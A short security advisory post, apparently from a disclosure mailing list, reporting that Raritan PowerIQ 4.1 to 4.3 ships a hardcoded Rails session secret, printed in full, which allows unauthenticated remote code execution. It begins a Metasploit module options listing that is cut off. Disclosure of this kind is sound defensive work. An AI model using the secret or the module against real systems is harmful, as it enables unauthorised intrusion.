Posted by Brandon Perry on Mar 12

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web
interface with a hardcoded session secret
of 8e238c9702412d475a4c44b7726a0537.

This can be used to achieve unauthenticated remote code execution as the
nginx user on vulnerable systems.

msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

Name Current Setting…